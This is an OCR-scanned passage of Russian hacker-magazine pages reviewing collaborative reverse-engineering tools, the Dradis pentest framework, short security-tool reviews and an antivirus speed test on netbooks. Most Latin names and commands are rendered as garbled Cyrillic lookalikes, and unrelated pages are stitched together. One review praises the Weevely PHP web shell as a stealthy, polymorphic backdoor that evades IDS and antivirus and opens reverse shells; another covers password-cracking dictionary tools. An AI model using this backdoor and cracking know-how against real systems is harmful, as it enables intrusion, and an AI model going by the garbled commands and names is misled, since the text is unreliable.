начал появляться софт для совместного 
ее анализа. 

• ОА 8упс { ЬіМѵ/УѴМАоѵѵ І — один из пио- 
неров в этой области, тулза, выпущенная 
в далеком 2005 году и позволяющая ре- 
версорам делиться своими наработками 
с коллегами в режиме реального времени. 
ЮА Зупс представляет собой централизо- 
ванный сервер, написанный на РуіГіоп, 
и плагин для ЮА, через который все участ- 
ники коннектятся к серверу. Как только 
клиент присоединился к серверу, все 
изменения, сделанные им (переимено- 
вание функций, локальных переменных, 
комментарии), немедленно передаются 
остальным участникам команды. Кроме 
этого, центральный сервер хранит копию 
всех изменений, позволяя новому анали- 
тику в считаные секунды влиться в работу. 
Помимо прочего, возможность этого ин- 
струмента работать в реальном времени 
и мгновенно отображать вносимые изме- 
нения может быть использована для про- 
ведения демонстраций/презентаций или 
обучения реверсингу. 

• СоІІаЬНЕаіе ( ЬіМѵ/ааООШ ) — еще один 
отличный инструмент для совместного 
реверсинга, появившийся на свет в 2008 
году. Он также состоит из серверной ча- 
сти, отвечающей за хранение и синхро- 
низацию изменений между всеми клиен- 
тами, и клиентской части в виде плагина 
для ЮА. Как и ЮА Зупс, хранит все изме- 
нения и при подключении нового клиента 
позволяет ему быстро получить актуаль- 
ную версию исследуемого файла. Инте- 
ресно, что в данном инструменте начали 
проглядываться хоть и слабые, но впол- 
не различимые черты систем контроля 
версий. Так, Со11аЬПЕа!е позволяет раз- 
работчику форкнуть текущий анализ би- 
нарника и продолжить его исследование 
в другом ключе, не затрагивая при этом 
работу остальных участников. 

• ВіпСгоіАгсІ ( ЬіМѵ Л 11)002 1 — 2 упатіс 8 , 
разработчик таких популярных расшире- 
ний для ЮА, как ВіпОіЛ и ВіпМаѵі, выпусти- 
ла в 2010 году инструмент ВіпСгоѵѵсІ. Дан- 
ная тулза для организации совместной 
работы использует принцип функциони- 
рования систем контроля версий. Она по- 
зволяет создать централизованный ре- 
позиторий дизассемблированного кода, 
посредством которого можно делиться 
наработками со всеми членами коман- 
ды. В такой репозиторий можно «комми- 
тить» новые имена и прототипы функций, 
комментарии и прочую информацию, 
обнаруживаемую во время реверсинга. 
Плагин для ЮА написан на РуІІіоп и тре- 
бует для своей работы установленного 
ЮАРуіІюп минимум версии 1 .3.2. 

Ничего сложного в использовании описан- 
ных инструментов нет, а всю необходимую ин- 
формацию по установке/настройке/исполь- 
зованию можно найти в соответствующих 
геабте-файлах или на официальных сайтах. 
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пользователи сервиса, тут можно создать группу, которую указывать 
затем при загрузке аннотаций. 

На этом, собственно, вся установка закончена. Можно пере- 
ходить к использованию. Рассмотрим процесс работы с Сго\л/бРЕ 
на примере двух аналитиков. 

АНАЛИТИК НОМЕР РАЗ 

Итак, первый аналитик запускает ЮА, загружает зловред и начина- 
ет анализ. Первой на глаза ему попадается функция, которая пишет 
какие-то данные в ветку реестра НКЕѴ_СІ)РРЕМТ_и8ЕР\5о^аге\ 
Місго50Й\ѴѴіпсІо\л/8 МТ\СиггепІѴег5іоп\\/\/іпсІо\л/8. Он анализирует ло- 
кальные переменные, дает им читабельные названия и переимено- 
вывает функцию из 8иЬ_ХХХХХ в Реді8ІегАЗЕР(). 

В дальнейшем его внимание привлекает константа, участвующая 
в генерации таблиц для АЕ8-шифрования. Копая код дальше, обна- 
руживаем, что малварь использует реализацию (ЗІасІтап’а алгоритма 
шифрования АЕ8 с фиксированным 128-битным ключом. Аналитик 
снова приводит код в читабельный вид и загружает все изменения 
в облако СгоѵѵсІРЕ. Для этого нажимает <СХг\ + Р2>, в результате чего 
появляется диалоговое окно, в котором предлагается выбрать функ- 
ции для экспорта. Отмечает нужные функции и нажимает «ІІрІоасІ 
аппоШ1іоп8». 

АНАЛИТИК НОМЕР ДВА 

В то же самое время над этим же бинарником трудится второй ана- 
литик. В процессе анализа он натыкается на функцию, загружающую 
файл с инета, вызывает функцию 8иЬ_404814 для расшифровки/де- 
обфускации файла и сохраняет его на диск. Переходит в эту функцию 
8 уЬ_404814 и нажимает <С1г1 + Р2> для вызова плагина СгоѵѵсІРЕ, что- 
бы посмотреть, доступны ли для данной функции аннотации. В по- 
явившемся окне становится видно, что первый аналитик уже разо- 
брал эту функцию и даже дважды успел «закоммитить» информацию 
по ней. Второй аналитик выбирает более поздний коммит, нажимает 
«Ітроіі аппоШІіоп...» и в появившемся окне может выбрать, какие 
параметры импортировать из СгоѵѵсІРЕ-облака: имя функции и про- 
тотип, комментарии, имена и типы локальных переменных. Стоит 
отметить, что даже определенные первым аналитиком типы пере- 
менных будут доступны в облаке и подгрузятся второму аналитику. 
Как только первый аналитик начинает загружать аннотации в облако, 
СгоѵѵбРЕ-плагин устанавливает, что пользователем была опреде- 
лена новая структура (ЭАезКеу, и автоматически загружает в облако 
определение этой структуры. На самом деле плагин работает таким 
образом, что автоматически подгружает в облако все зависимости 
для каждой переменной, используемой в экспортируемой функции. 
Как только второй аналитик выбрал необходимые параметры и нажал 
кнопку «ІтроП», изменения применяются к его ісІЬ-файлу. 

Загружать аннотации вручную к каждой функции не совсем удоб- 
но. Вместо этого аналитик может нажать на кнопку «ВаІсИ ітрогі 
аппо!а1іоп8...», чтобы посмотреть все доступные варианты из облака 
СгоѵѵбРЕ. В результате чего откроется диалоговое окно, в котором 
будет представлен весь перечень функций, для которых доступны ан- 
нотации. Выбрав нужные и нажав на «Ітрогі аппоіаііопз», можно за- 
грузить сведения о них в свою локальную ісІЬ-базу. Вот в общем виде 
и весь процесс реверсинга с использованием сервиса СгоѵѵсІРЕ. 
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Пакетный импорт аннотаций из облака СгоѵѵбВЕ 




Импортируем результат работы различных инструментов: Ытар, 
N08808, Нікіо, е(с. 




Создаем новую заметку 

0КА0І8 

Ну что ж, с коллективным реверс-инжинирингом приложений 
мы разобрались. Теперь пришло время выяснить, как обсто- 
ят дела у их собратьев по цеху — пентестеров. Как и в случае 
исследования сложной малвари, безопасность крупного объ- 
екта в одиночку не проверишь. Командная работа снимает эту 
проблему, но ставит другую — действия команды надо как-то 
координировать, а результат работы хранить. Иначе при те- 
стировании безопасности какой-либо сети может получиться, 
что половина тестирует один хост, вторая другой, а остальные 
объекты остаются обделенными вниманием. Кроме этого, 
внутри команды может быть разделение обязанностей и каж- 
дый член команды может иметь свою специализацию; кто-то 
гуру в сканировании сети и с легкостью управляется с Мтар 
даже с закрытыми глазами, кто-то съел собаку на 801- 
инъекциях, кто-то щелкает веб-приложения как орешки. 
Но при всем при этом им надо как-то делиться информацией 
о найденных уязвимостях со своими коллегами. Ведь най- 
денная скуля может быть тем недостающим звеном, которо- 
го не хватает другому члену команды для получения доступа 
к внутренней сети исследуемого объекта. Собирая воедино 
все сказанное, можно обобщить, что пентестерам нужен ин- 
струмент, позволяющий координировать работу и делиться 
информацией. Обладает всеми необходимыми возможностя- 
ми и способен удовлетворить основные потребности тести- 
ровщиков фреймворк 0гасІі8 ( бгасііз^гатеѵѵогк.ога ). с кото- 
рым мы познакомимся чуть поближе. 

УСТАНОВКА/НАСТРОЙКА 

На официальном сайте (а также на нашем диске) доступны вер- 
сии для Ѵ\/іпс1оѵѵ8 и *піх. Установка Огасііз под виндой вызвать за- 
труднений не должна — все необходимое включено в инсталля- 
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Ломаем вместе 






тор. А вот на *піх придется дополнительно поставить РиЬу (так 
как Огесііб на нем написан); 

5ис1о арі-ееі: іпзіаіі гиЬу ігЬ гйос гиЬу1.9-с1еу 
1іЬореп55І-гиЬу гиЬу^ешБ 



# библиотеки З^іііеі.:; 

5иао ар1:-§е1: іп5І:а11 ІіЬБрІіНеЗ-Ѳ 1іЬ5ЯІі1:еЗ-сІеѵ 



# и . КиЬу . З.ип^ 

Бисіо ёет іпБІіаІІ ЬипсЦег 

Следующим шагом после установки идет настройка. 
Для этого необходимо выполнить скрипт гезеізИ или гезеІ.Ьаі 
под виндой. Это подготовит конфигурационные файлы и базу 
данных, которая будет выступать в качестве репозитория. 

После чего с помощью скрипта зІагГзИ/зІаП.ЬаІ мож- 
но запустить непосредственно сам Огасііз. По умолчанию 
веб-интерфейс приложения будет висеть на порту 3004: 
бирз://127.0.0.1 ;3004/. А чтобы забиндить, к примеру, 443-й 
порт и заставить Огасііз слушать все сетевые интерфейсы, 
надо запустить скрипт зІаП.зІі/з^аП.ЬаІ со следующими па- 
раметрами: 



В<в Есііі Нфіму Вооктагкі Цеір 

** 0 • Р ІИ ьИр»:/Л9г.Іба 49.126:3004/ ~ 



» - О - - У ^ 



е- 



ЁГі<тппГготП* .. Цеіроіі' 
.««мвгапел ч? Й 
< '::|0нднмА Ргсисі 



л ТІкіеіІіоіІ ж« - /тр *с«г 
4 ^12700 1(Юс«юі() 
•Іів04с|) 

СдЗОООДср 



17*п*!*тпд сіаіа Л’от 192.166.49 126. . 



4 

ха# 



а*МгМ* ^по(ас*(«яоп«і' 4? 



^С*1*«агу: Мпмр оіЯриІ 

т 127001 ’Нойпт** Мс«К)|1 Р«1 Й04СР к оіип (іуіѵасІіГ * 



127.0.аі: 

Ноаіпатев: ІосаІЬозІ 
Роіі #80/Іср 18 ореп (зуп-асЮ 

■ Зѳгѵісе: Іііір 

■ Ргосіисі; Арасііѳ ЬЩзс! 

■ Ѵегвіоп: 2.2.9 

Рол #3000Л:ср 16 ореп (вуп-асіс) 

■ Зѳгѵісе: НЬф 

Ме((і ічрстіпси... №«7ш>в(( ' 



г АрасШі Мшіраарсі 



ік*«і г2.5.в • кШшиГпфкк 



Аитог іліцрішм 



1««|> 0$7«І>20100» 



3^мл'вб.'49.І2б 3004 # ! ® |§/| іагі'бгдэ'Ггв^]^’ 



# ./БІ:аг 1 :,БИ ‘Ь 0 , 0 , 0.0 -р 443 

Теперь, когда Огабіз установлен и запущен, пришло время 
познакомиться с его возможностями поближе. 

ТЕСТ- ДРАЙ В 

Залогинившись в Огасііз, мы видим достаточно простой 
и дружелюбный веб-интерфейс. Прежде чем начать какую- 
либо деятельность, надо создать своего рода новый проект. 
Для этого нажимаем на «АРб ЬгипсИ» и даем название создан- 



Так как в процессе проведения пентеста 
применяется множество различных специ- 
фичных приложений, то результат их рабо 
ты хотелось бы прикреплять к проекту 



ПРОГРАММЫ ДЛЯ ПРОВЕДЕНИЯ 
КОЛЛЕКТИВНОГО ПЕНТЕСТА 

Естественно, ОгаРіз не единственный инструмент, 
призванный помочь при командной работе. 
Существует ряд альтернатив. 



ИР АМР Ы1.|у/2Ед ||Т 

Распределенное масштабируемое веб-приложение, 
позволяющее выполнять тестирование безопасности 
веб-приложений в автоматическом режиме, объединяет 
все результаты сканирования объекта, позволяя оценить 
общий уровень его защищенности. 

НРРоПИу біЦу/УбѵѵЗРЗ 

Еще одно детище компании НР, позволяющее командам 



ному бранчу. Проекты имеют древовидную структуру — щел- 
кнув на нем правой кнопкой мыши и нажав «АРР сИіІР», мож- 
но добавить поддиректорию или отдельный хост. К любому 
созданному элементу можно добавить описание при помощи 
кнопки «аРР поіе». Так как в процессе проведения пентеста 
применяется множество различных специфичных прило- 
жений, то результат их работы (например, сканирование 
портов конкретного хоста) тоже хотелось бы как-то прикре- 
плять к проекту. И такая возможность в ОгаРіз есть. Он под- 
держивает импорт результатов работы следующих инстру- 
ментов: Вигр Зсаппег, МеРіаѵѵікі, 
Меззиз (у1, у2), Мехрозе, Мікіо, 
Мшар, ОрепѴАЗ, 08Ѵ0В, Веііпа, 
ЗигеСІіеск, ѴиІпОВ НО, ѵѵЗаІ, ѵѵХТ, 
2еР Аиаск Ргоху. Таким образом, 
просканировав какой-либо хост 
с помощью Мтар, Мікіо или какого- 
либо другого инструмента, резуль- 
тат его работы можно будет при- 
крепить к ОгаРіз. Для этого следует 
выбрать «ІтроП Тгот ЯІе... пеѵѵ 
ітрогЪ», затем выбрать тип инструмента из приведенного 
списка и его выходной файл, после чего все данные будут 
импортированы. Поддержка работы со столькими инстру- 
ментами достигается за счет использования плагинов. Если 
в приведенном стандартном списке нет какой-либо тулзы, 
которой ты часто пользуешься во время своих тестов, огор- 
чаться не стоит. Плагин для импорта результатов ее работы 
можно написать самому. Для этого лишь нужно немножко 
знать ВиЬу, всю остальную информацию можно почерпнуть 
из туториала — ЫМѵ/ртхбѵа . После окончания тестирования 
результат работы можно экспортировать в различные фор- 
маты ѴѴогсі, РОЕ или опять же написать плагин для экспорта 
в какой-то специфичный формат. Как видишь, работа с дан- 
ным инструментом предельно проста и не требует каких-то 
особых навыков. Гибкость в использовании и возможность 
структурированно хранить результаты работы всех участни- 
ков команды позволяет получить более детальную картину 
о безопасности исследуемого объекта. Что делает Огасііз од- 
ним из незаменимейших инструментов при проведении мас- 
штабных тестов на проникновение. 

ЗАКЛЮЧЕНИЕ 



разработчиков и пентестеров быстро идентифицировать 
и фиксить уязвимости, а благодаря удобному веб- 
интерфейсу и репозиторию быстро делиться информацией 
со всеми членами команды 

Ѵегасосіе ѵегасосіе сот 

Целая облачная платформа, позволяющая проводить 
тестирование объектов и рассчитывать общий уровень их 
безопасности 



Вот мы и познакомились с двумя популярными инструмен- 
тами, используемыми для организации совместной рабо- 
ты. Реальность такова, что герои-одиночки остались только 
в голливудских боевиках, а для того, чтобы сделать что-то 
серьезное и стоящее, приходится работать командой. Так 
что теперь при необходимости поработать в коллективе 
ты знаешь, какими тулзами можно пользоваться. А в том, 
что необходимость совместной работы появится, можно 
даже не сомневаться. ЗС 



Загруженный результат 
работы сканера Мтар 

ПОШАГОВЫЕ 
ИНСТРУКЦИИ 
ПО УСТАНОВКЕ 
0РА0І8 



Огасііз на ОЗ X — 
ЬіМѵ/ѵН4АЬА . 
ІІЬипІи — 
ЬіМѵ/пЗиРеР . 
РгееВЗО - 



Для тех, кто плани- 
рует использовать 
Огасііз в винде из-под 
Судѵѵіп консоли 
Меіазріоіі’а, — вот 
хороший туториал, 
как это сделать: ЬіМу/ 
УеіѵЫ . Если же хочет- 
ся попробовать тулзу 
в действии, а ковы- 
ряться с установкой/ 
настройкой желания 
нет, то можно заюзать 
Васкігаск, в котором 
Огасііз уже предуста- 
новлен. 




оѵо 



Как всегда, весь 
упомянутый в статье 
софт ты можешь найти 
на нашем диске. 



9 ** 



Взлом 
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Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция за твои действия ответственности не несут! 

Дмитрий «Оіді» Евдокимов, 
Оідііаі 8есигі!у 
@еѵсіокітоѵсІ8 
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ПРОВЕРЯЕМ РЕЛЬСЫ 



ОФЛАЙН-ОТЛАДКА 



ИЩЕМ ООМ Х88 В ВОНТІМЕ 



В последнее время складывается такое ощуще- 
ние, ЧТО РиЬу оп Ваііз (или, как его еще любят 
сокращать, ВоР) решил посоревноваться с иаѵа 
и РІазН в количестве уязвимостей. Естественно, 
с этим надо что-то делать. В итоге на свет появил- 
ся Вгакетап — сканер безопасности для статиче- 
ского анализа проектов на РиЬу оп Раііз. 

Этот проект позволяет находить пробле- 
мы безопасности по исходным кодам Раііз- 
приложений на любой стадии их разработки. 
Помимо этого, проект умеет проверять код на ис- 
пользование Ьезі ргасіісез. Для запуска сканера 
достаточно одной команды: 

Ьгакетап ваше_гаі1з_приложение 

Все найденные проблемы Вгакетап разде- 
ляет на три уровня критичности (\л/еак, тесііит 
и Ііідіі) и типы уязвимостей, среди которых, поми- 
мо Х58, С8РР, 80и, Соттапб Іпіесііоп, присут- 
ствуют и Ретоіе Ехесиііоп іп УАМІ.ІоасІ, Оупатіс 
Репбег РаШз, Оапдегоиз 8епб и другие. Сейчас 
уже проект легко обнаруживает: 

• СѴЕ-2013-0155, 

• СѴЕ-2013-0156, 

• СѴЕ-2013-0269, 

• СѴЕ-2013-0276. 

• СѴЕ-2013-0277, 

• СѴЕ-2013-0333. 

Полезная возможность сканера — можно от- 
метить, что искать и что не искать, это поможет 
избежать большого количества ложных сраба- 
тываний. Также Вгакетап можно использовать 
как библиотеку в собственном проекте. 



Маіѵѵазт предназначен для помощи при ре- 
верс-инжиниринге. Базируется он на двух других 
очень крутых проектах: Сискоо 8апбЬох ( ѵѵѵѵѵѵ. 
сискоозапбЬох.ого ) и РІМ ( іп!еІ.Іѵ/ХН8Р8а Т Алго- 
ритм работы следующий: 

1. Вредоносное ПО для анализа запускается 
в песочнице Сискоо 8апбЬох. 

2. Во время выполнения все действия програм- 
мы логируются с помощью ріпіооі. 

3. Все действия и изменения в системе сохраня- 
ются в базу данных (Розідгез). 

4. Визуализировать данные из БД для удобного 
анализа и управлять ими можно через веб- 
интерфейс. 

Кратко приведу некоторые из основных фи- 
шек Маіѵѵазт: 

• офлайн -отладка программы; 

• возможность перемещаться во времени 
в процессе отладки (буквально, с помощью 
специального слайдера); 

• отображение состояния регистров и флагов; 

• отображение зіаск/ііеар/баіа; 

• опция «РоІІоѵѵіпд битр»; 

• работа полностью в браузере. 

Для работы с программой достаточно двух ко- 
манд и входа в веб-интерфейс: 

1 . иІіІз/зиЬтЦ.ру таІѵѵаге/Ьаб.ехе. 

2. ѵѵеЬ/таІѵѵазт_ѵѵеЬ.ру. 

3. Заходим на И«р://127. 0.0. 1:5000. 

При желании уже сейчас можно посмотреть 
на веб-интерфейс проекта и его возможности 
по адресу таіѵѵазт.сот . 



ООМіпаІог — это расширение Рігеіох, которое 
должно войти в джентльменский набор пентесте- 
ра. Аддон предназначен для анализа и иденти- 
фикации ООМ Вазеб Сгозз 8і1е 8сгір1іпд проблем 
(ООМ Х88). Фактически это первый гипііте- 
инструмент, который помогает идентифициро- 
вать ООМ Х88. 

Инструмент доступен в двух различных ва- 
риантах: бесплатном и платном (профессио- 
нальном). Бесплатная версия ООМіпаІог откры- 
та для соттипііу, а Рго имеет дополнительные 
фичи, типа дополнительной поддержки, улучшен- 
ного (31)1, более расширенной базы правил и базы 
знаний. 

Для своей работы данный инструмент исполь- 
зует динамическое тейнтирование строк во вре- 
мя работы пользователя с нативным браузером. 
Строка помечается при входе и трассируется 
на протяжении всего времени ее использования 
в браузере. Трассировка таких помеченных строк 
позволяет понять, действительно ли эксплуатиру- 
ема ООМ Х88. 

Для понимания кода инструмент использует 
технологию Реа.Оу.Оа.Та. (акроним от РеаІІіте 
Оупатіс Оаіа Таіпііпд), которая базируется на на- 
тивном баѵа8сгір1-движке браузера, что улучшает 
качество анализа и дает возможность работать 
с обфусцированным кодом. 

На текущий момент ООМіпаІог способен по- 
мочь в идентификации геТІесІеб ООМ Вазеб 
Х88, но потенциально возможно расширить его 
и для идентификации зіогеб ООМ Х88. Кстати, на 
сайте есть подробные примеры того, как этот за- 
мечательный аддон можно использовать для по- 
иска уязвимостей и их исправления. 
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□ ІІЗІ: аиаіІаЬІе тоЛиІез 

Но гезропзе 
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Автор: ЕгпіІіоРіппа Система: ѴѴіпсІоѵѵз/ипих 
е^іппа.^і!^^^Ь■Сот/V\/ееѵеIѵ 



РНР-ШЕЛЛ 

ѴѴееѵеІу — скрытый и миниатюрный РНР-веб- 
шелл, который предоставляет 88Н-подобную 
консоль управления. Незаменим на этапе постэк- 
сплуатации веб-приложения. Также может быть 
использован как Ьасксіоог в системе. Сам шелл 
состоит из более чем 30 модулей, которые авто- 
матизируют как административные, так и постэк- 
сплуатационные задачи: 

• выполнение команд и просмотр удаленной 
файловой системы, даже с ограничениями 
безопасности РНР; 

• аудит общих неправильных настроек сервера; 

• запуск 801-консоли на целевой машине; 

• проксирование своего НТТР-трафика через 
жертву; 

• монтирование жертвы к себе; 



• передача файлов с машины жертвы; 

• порождение геѵегзе и сіігесі ТСР-шеллов; 

• перебор 801-аккаунтов через системных 
пользователей жертвы; 

• запуск сканирования портов 
с машины жертвы. 

Также отдельно хочется отметить, что обще- 
ние с шеллом обфусцировано и позволяет обхо- 
дить сигнатурное обнаружение, используемое 
N108. Также сам Ьасксіоог имеет полиморфный 
РНР-код, который позволяет избежать обнаруже- 
ния НЮ8 АѴ. Проект, кстати, уже 23 раза ^огк'нули 
на (ЗіШиЬ: если покопаться, то можно найти инте- 
ресные модификации. 
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ЦЕЛЬ- МЕЙНФРЕЙМ 



ФАЗЗИМ8СА0А 



УМНЫЕ СЛОВАРИ 



Сейчас очень модно ломать браузеры, мо- 
бильные девайсы, 8САОА-системы и спутни- 
ки. И все, кажется, забыли о таких махинах, 
как мейнфреймы. 

Для тех, кто не знает, мейнфрейм — это высо- 
копроизводительный компьютер со значитель- 
ным объемом оперативной и внешней памяти, 
предназначенный для организации централизо- 
ванных хранилищ данных большой емкости и вы- 
полнения интенсивных вычислительных работ. 
Его отличительные черты — высокое среднее 
время наработки на отказ (12-15 лет), повышен- 
ная устойчивость системы, большая пропускная 
способность, встроенные в аппаратуру возмож- 
ности защиты. 

МаіпТгатесІ представляет собой набор 
скриптов, ЗСЕ и программ для аудита безопас- 
ности мейнфреймов на 2/08. 2/08 — это про- 
приетарная 64-битная серверная операцион- 
ная система, разработанная компанией ІВМ 
для мейнфреймов собственного производства. 
В итоге в данный набор аудитора мейнфрейма 
входят: 

• Т80 Вгиіе; 

• Т80 изег/Разз 8пі^ег; 

• ММАР РаІсЬ; 

• Ме1са1дляУ88/ОМѴ8. 

Эта тема сейчас не особенно обсуждается, 
но при этом очень интересна. Для того чтобы 
более подробно узнать о безопасности мейн- 
фреймов, анализе их безопасности, подходя- 
щих инструментах, крайне рекомендую посетить 
таіп^гатесі767.1итЫг.сот . 



Обратимся к теме безопасности 8СА0А, а имен- 
но протоколу РРОРІМЕТ. Хотя его еще нет в 1ор-3 
протоколов США, но РРОРІМЕТ уже сейчас широ- 
ко используется как ІС8 (ІпЬизІгіаІ СотгоІ 8уз1ет) 
протокол в Европе, особенно в производствен- 
ном секторе. Россия не исключение. 

РРОРІМЕТ — открытый промышленный стан- 
дарт для автоматизации ЕШегпеІ РРОРІВУ8 & 
РРОРІМЕТ Іпіегпа^іопаі (РІ). Где можно встретить 
данный протокол? Например, компания 8іетепз 
делает РРОРІМЕТ-чипы и широко использует 
их в своих девайсах. Короче говоря, если взять 
какой-нибудь крупный промышленный объект, 
где есть управляемое оборудование и 8СА0А- 
системы, то этот протокол используется для пе- 
редачи данных между ними. 

Цель ясна, теперь перейдем к инструменту. 
РгоРи22 — это фаззер РРОРІМЕТ-стека. Осно- 
ван он на небезызвестном фреймворке 8сару. 
РгоРц22 на данный момент способен фаззить сле- 
дующие типы РРОРІМЕТ-фреймов: 

• а!г (АІагт Ргате Рапсіот); 

• а^о (АІагт Ргатез ОгсІегесІ); 

• рпіо (Сусііс РеаІТіте); 

• сіср (ОСР Ісіепіііу Рериезіз); 

• ріср (Ргесізіоп Тгапзрагет СІоск Ргоіосоі — 
ВЕГА). 

На самом деле хотелось бы, чтобы данный 
фаззер использовали при тестировании раз- 
работчики, которые пишут свой собственный 
РРОРІМЕТ-стек, а не хакеры, — а то мало ли 
что еще взлетит на воздух :). 



РАСК (Раззѵѵогсі Апаіузіз апб Сгаскіпд Тооікіі) — 
это набор утилит, предназначенных для анализа 
парольных словарей и улучшения их качества 
на основе умных правил генерации. Важно понять, 
что сам данный набор не способен взламывать 
пароли, а предназначен для повышения эффек- 
тивности взлома паролей программами-брут- 
форсерами. Весь набор состоит из четырех ос- 
новных скриптов: гиіедеп.ру, сіісізіаі.ру, тазкдеп. 
РУ, роіісудеп.ру. 

Риіедеп предназначен для анализа паролей 
и генерации правил для Назіісаі. Скрипт исследу- 
ет уже взломанные пароли и на основе их строит 
маску для генерации новых паролей, что может 
быть очень эффективно против еще не взломан- 
ных хешей в корпоративной системе. Как нетруд- 
но догадаться, это необходимо для Назбсаі Виіе 
Вазесі Аиаск. 

ОісГзІаІ и тазкдеп предназначены для анали- 
за паролей и генерации масок для НазИсаІ соот- 
ветственно. Они анализируют пароль или список 
паролей и выдают статистику на основе масок, 
которые представлены с помощью четырех кате- 
горий символов: символы нижнего регистра, сим- 
волы верхнего регистра, цифры и специальные 
символы. Функциональность в первую очередь 
предназначена для Назіісаі Мазк А«аск. 

Роіісудеп предназначен для генерирования 
словаря на основе политики: минимальное ко- 
личество символов каждого типа и общая длина 
пароля. Словарь идеально подходит для перебо- 
ра паролей из какой-нибудь корпоративной сети, 
так как именно в них чаще всего применяются па- 
рольные политики. 








ШРО 

Да, мы слышали, что некоторые 
компании снимают с произ- 
водства свои нетбуки. Но это 
не значит, что мы перестаем 
ихлюбить, - нам, произво- 
дителям цифрового контента, 
по-прежнему нравятся полно- 
ценные компьютеры на винде 
по 10 килорублей за штуку. 
Да и Моггоѵѵіпб с Негоез III 
на них идет неплохо;). 



Евгений Дроботун 

(1гоЬо1ип@хакер.ги 



ОТ РЕДАКЦИИ 

Капитан Очевидность поясня- 
ет, что в подзаголовке статьи 
мы упомянули его не зря. Дело 
в том, что результаты этого 
теста многие компьютерщики 
на интуитивном уровне и так 
подозревали. Но интуиция 
одно, а практика - дело 
другое. Лично меня один 
из представителей теста 
немного удивил. 



САМЫЙ БЫСТРЫЙ 
АНТИВИРУС 



ПЕРВОЕ ТЕСТИРОВАНИЕ, 
ПРОВЕДЕННОЕ ПРИ 
ИНФОРМАЦИОННОЙ 
ПОДДЕРЖКЕ КАПИТАНА 
ОЧЕВИДНОСТЬ! 



С егодня мы оставим в покое 
способности антивирусов рас- 
познавать всяческие угрозы, 
противостоять вредоносному 
коду и бороться с хитроумными криптора- 
ми и антиэмуляционными приемами. 

Подойдем к тестированию несколь- 
ко с другой стороны и проверим, ка- 
кой из антивирусов больше подходит 
для установки на нетбуки, которые, 
как известно, не могут похвастаться изо- 



билием ядер, гигагерц и объемов опера- 
тивной памяти. 

Итак, на старт приглашаются: 

• Антивирус Касперского 2013, 

• Ог.ѴѴеЬ 7.0, 

• N0032 8таП Зесигііу 5, 

• МІСГ050Й ЗесигіТу ЕззеШіаІ. 

Кто из этих четырех борцов с вредонос- 
ным кодом достоин желтой майки лидера? 
Совсем скоро мы об этом узнаем... 
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П Время загрузки системы 

Время загрузки системы из- 
мерялось с помощью утилиты 
ВооШасег. Для начала мы за- 
мерили время загрузки «чистой» 
системы, без какого-либо 
антивируса, а затем проверили 
все антивирусные продукты 
по очереди. 

По результатам этого ис- 
пытания М8Е и N0032 вырвались 
вперед, довольно-таки серьез- 
но опередив соперников. Эти 
два антивируса практически 
не замедляют процесс загрузки Результаты теста № 1 

системы, и он проходит почти так 
же, как и на «чистой» системе. 




г 



Время загрузки 
хакер. ги в СИгоше 

Для проведения этого теста 
впишем в стартовую страницу 
СІігот’а наш любимый сайт 
и настроим АррТітег на трид- 
цатикратный запуск браузера. 
После того как АррТітег закончит 
свое дело, результаты замеров 
окажутся в заранее указанном 
лог-файле. Так же как и в первом 
случае, сначала проверим на си- 
стеме без антивируса, далее — 
с каждым антивирусом по очере- 
ди. Здесь явный лидер N0032, 
затем почти на равных следуют 
М8Е с «Доктором» и, с большим 
опозданием, «Касперский». 




Результаты теста № 2 




Время загрузки хакер. ги 
в СИготе с включенным 
обновлением 
антивирусных баз 

Этот тест повторяет предыдущий, 
за исключением того, что запуск 
СИгот’а производился при вклю- 
ченном обновлении антивирус- 
ных баз и тест не проводился 
на «чистой» машине. 

Понятно, что процесс об- 
новления замедляет загрузку 
сайта, и это видно по результа- 
там. Что же касается лидеров 
и отстающих, то здесь картина 
аналогичная. 




Результаты теста № 3 




Время открытия 
документа в М іеговой! ѴѴогб 

Измерительным инструментом 
для этого и следующего тестов 
также послужит АррТітег. Загру- 
жать будем не совсем маленький 
документ объемом около полу- 
тора мегабайт. В итоге видим, 
что Ог.ѴѴеЬ и КІ8 замедлили про- 
цесс запуска ѴѴогб’ а и загрузки 
документа чуть больше, чем 
на секунду, в то время как работа 
остальных двух оказалась не так 
заметна. Лидер здесь М8Е. 







Результаты теста № 4 




Для чего обычно используют нет- 
бук? Выйти в Сеть в общественных I 
местах, отредактировать не слиш- | 
ком объемные тексты, разложить 
«косынку», ну и изредка возникает 
необходимость что-нибудь заар- 
хивировать или разархивировать. 
Поэтому мы замеряли время вы- 
пол нения следующих операций: . 

* загрузка системы: без антиви- 
русной программы и с установлен- 
ными проверяемыми антивируса- 
ми поочередно; 

* загрузка сайта хакер. ги 

в СИготе: параметр поочередно 
проверялся на нетбуке без анти- 
вируса и с каждым из тестируемых 
антивирусов; 

■ то же, с обновлением анти- 
вирусных баз: параметр по- 
очередно проверялся с каждым 
из тестируемых антивирусов 
при включенном обновлении анти- 
вирусных баз; 

* загрузка документа в ѴУогсІ: без 
антивирусной программы и с уста- 
новленными проверяемыми анти- 
вирусами поочередно; 

* то же, при полном сканирова- 
нии: с каждым из проверяемых 
антивирусов поочередно; 

* проверка коллекции файлов: 
параметр поочередно прове- 
рялся с каждым из тестируемых 
антивирусов; 

* архивирование файлов при пол- 
ном сканировании; параметр 
поочередно проверялся с каждым 
из тестируемых антивирусов. 

Чтобы получить более-менее 
адекватную картину, одного измере- 
ния мало, поэтому каждый параметр 
измеряли тридцать раз, высчитывали 
среднее арифметическое и для на- 
глядности строили графики. 

Для измерения времени загруз- 
ки системы была выбрана утилита 
ВооШасег, а для оценки времени 
загрузки сайта в С^іготе и времени 
загрузки документа в ѴѴогб — утилита 
АррТітег. 

Конфигурация нетбука — самая 
обычная безо всяких изысков: Іпіеі 
Аіот 1 ,67 ГГц, 2 Гб оперативки, 300 Гб 
жесткий диск, видео от ІпІеІ и ѴѴіпсІоѵѵз 
7 8іаПег 8Р1. 

Для каждого антивируса прово- 
дилась своя серия экспериментов, 
далее система полностью переуста- 
навливалась с нуля и устанавливался 
очередной испытуемый антивирус. 
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Время открытия документа 
в МІСГ 080 І 1 Ѵ\^огсі с включенной полной 
проверкой компьютера 

Повторим предыдущий тест, но с вклю- 
ченной полной проверкой компьютера 
на наличие вирусов. 

Лидер остался тот же, на второе 
место вырывается «Касперский», далее, 
с небольшой задержкой, N0032, и по- 
следним приходит Ог.ѴѴеЬ. 




Результаты теста № 5 




УМНАЯ 

КНИГА 



Если ты хочешь более подробно 
